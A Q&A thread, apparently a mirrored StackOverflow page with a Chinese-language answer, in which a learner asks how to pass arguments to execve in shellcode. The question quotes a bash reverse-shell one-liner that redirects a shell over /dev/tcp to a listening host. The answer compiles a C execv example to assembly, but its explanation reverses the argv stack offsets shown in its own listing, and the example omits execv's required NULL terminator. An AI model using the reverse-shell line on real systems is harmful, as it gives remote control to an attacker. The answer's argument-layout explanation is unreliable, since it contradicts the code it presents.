2

I'm having a go at learning assembly and writing shellcode. I have a question about execve and passing arguments to the program it will execute.

I have working code to execute a bash shell but am unsure of the input format of execve to pass additional arguments to it. Can I do stdin stdout redirects too? I wanted to create a reverse tcp connection with this type of command line:

/bin/bash -i >& /dev/tcp/192.168.1.4/1234 0>&1

Should the arguments be separated with NULL's? I got it to execute a shell but it didn't connect back to the listening nc.

I know this is an unusual way of doing this but I just wanted to try something different :-)

Cheers

4

1 回答 1

1

知道如何做的最好方法是编译一个示例并在汇编级别停止。让我们举这个例子:

#include <unistd.h>

int
main ()
{
  char *program = "/bin/ls";
  char *args[3] = {"/bin/ls", "-l", "./"};

  execv(program, args);

  return 0;
}

编译后,gcc -Wall -Wextra -S -o myexec.s myexec.c您可以阅读myexec.s

        .file   "myexec.c"
        .section        .rodata
.LC0:
        .string "/bin/ls"
.LC1:
        .string "-l"
.LC2:
        .string "./"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        pushq   %rbp
        movq    %rsp, %rbp
        subq    $32, %rsp
        movq    $.LC0, -8(%rbp)
        movq    $.LC0, -32(%rbp)
        movq    $.LC1, -24(%rbp)
        movq    $.LC2, -16(%rbp)
        leaq    -32(%rbp), %rdx
        movq    -8(%rbp), %rax
        movq    %rdx, %rsi
        movq    %rax, %rdi
        call    execv
        movl    $0, %eax
        leave
        ret

因此,命令行的参数列表由字符串列表组成,第一个参数是可执行文件的路径 ( -8(rbp)),然后每个参数通过指向其字符串的指针传递:argv[0] = -16(%rbp), argv[1] = -24(%rbp), argv[2] = -32(%rbp), ...等等。

因此,您只需要在调用execv.

于 2013-04-19T12:59:11.090 回答